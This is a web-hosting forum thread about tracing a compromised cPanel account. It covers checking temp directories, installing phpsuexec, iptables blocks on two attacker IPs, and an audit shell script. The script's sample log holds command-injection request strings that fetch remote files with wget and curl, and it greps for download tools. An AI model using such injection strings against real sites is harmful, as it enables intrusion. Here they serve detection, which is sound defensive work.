Recent hackers

turnkey

New member
Ok, I've been tracking this guy(s) down for a couple of weeks and finally got some control over it.

First, one of my users got compromised, so the server is still safe.

This is what to look for:

1. check your /tmp all the time
2. check your /dev/shm all the time

Both of these are temp directories.

The user will try to upload DoS attack files here.

The only way to catch them is to install phpsuexec; there is a good thread at the cPanel forums and it is pretty easy now to set up.

Once phpsuexec is done, if you see strange files they will now be owned by a user instead of nobody (easier to track down).

Find the user who is causing the problem and suspend their account. I know they are not at fault, but security comes first. They will understand. They may have to re-upload their site or look through all their PHP/CGI code in case any nasty Easter eggs have been dropped.

Now, look in your Apache usage and find what they were doing. You will get their IPs.

In my example, I had 2 attempts from Canada and EV1. Both of these IPs have been dropped in iptables.

Here is how to block their IPs:

iptables -I INPUT -s 205.207.137.3 -j DROP && echo Dropped 205.207.137.3
iptables -I INPUT -s 64.246.42.44 -j DROP && echo Dropped 64.246.42.44

Remember this is only for when the machine is up. If you reboot you have to do this again. Might be a good idea to put it in a shell script and run it manually after a reboot, or place it in your /etc/init.d.

Hope this helps, and if you are not running phpsuexec on cPanel you should. I have not seen any limitations to PHP at all. You might get a couple of 500 errors but they are easily fixed with the how-to on cPanel's forums.

Good luck, hope this helps somebody.
 
Good post on your part, Turnkey; it seems a good one for newbies/self-admins to secure their servers.

Cheers.
 
Turnkey, why wouldn't you just put their IPs in deny.hosts?
Glad you caught them though and hope they don't give you any more problems.
 
A lot of times hacks happen from insecure CGI/PHP scripts. If it's a cPanel box you can track this down using:

for files in /usr/local/apache/domlogs/*; do grep -H "wget" "$files"; done

A lot of people don't do it, but you can set noexec,nosuid on your /dev/shm in fstab.
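Pulling the thread's advice together, here is an added audit script (not code from any poster): it lists what sits in the shared temp directories with the owning user, counts domlog requests that mention a download tool (the "grep wget" idea above, extended to curl and friends), and checks whether a mount line carries noexec,nosuid. The domlogs path is the cPanel one from the thread; the sample log and fstab line are constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the thread. Assumes the cPanel domlogs path
# mentioned above; the sample data below is constructed for the demo.

DOMLOGS="/usr/local/apache/domlogs"

# List regular files in the shared temp directories with their owner, so an
# uploaded tool shows up under the account that dropped it once phpsuexec
# replaces "nobody" with the real user.
list_tmp_files() {
  for d in "$@"; do
    [ -d "$d" ] && find "$d" -xdev -type f -exec ls -ld {} \; 2>/dev/null
  done
  return 0
}

# Count log lines mentioning a remote-fetch tool; same idea as grepping the
# domlogs for "wget" above, but case-insensitive and covering curl and friends.
count_fetch_hits() {
  cat "$@" 2>/dev/null | grep -ciE 'wget|curl|lynx|fetch' || true
}

# Return 0 when a mount line (fstab or /proc/mounts format) has both noexec
# and nosuid in its options field (4th column), 1 otherwise.
mount_is_hardened() {
  opts=$(printf '%s\n' "$1" | awk '{print $4}')
  case ",$opts," in
    *,noexec,*) case ",$opts," in *,nosuid,*) return 0 ;; esac ;;
  esac
  return 1
}

# Constructed sample log: two of the three requests try to pull a remote file.
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [10/Oct/2005:13:55:36 -0700] "GET /index.php?page=x&cmd=wget%20http://example.invalid/x HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2005:13:56:01 -0700] "GET /images/logo.gif HTTP/1.1" 200 2048
203.0.113.5 - - [10/Oct/2005:13:57:12 -0700] "GET /gallery.php?id=1;CURL%20http://example.invalid/y HTTP/1.1" 500 0
EOF

echo "sample log: $(count_fetch_hits "$SAMPLE_LOG") fetch attempts"
rm -f "$SAMPLE_LOG"
if mount_is_hardened "tmpfs /dev/shm tmpfs defaults,noexec,nosuid 0 0"; then
  echo "sample fstab line for /dev/shm is noexec,nosuid"
fi
# Live run on a real box (uncomment):
# list_tmp_files /tmp /dev/shm; count_fetch_hits "$DOMLOGS"/*
# mount_is_hardened "$(grep ' /dev/shm ' /proc/mounts | head -n1)"
```

Matching on the request line only flags fetch attempts; read the hits in context, since a legitimate page can contain the word too.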
 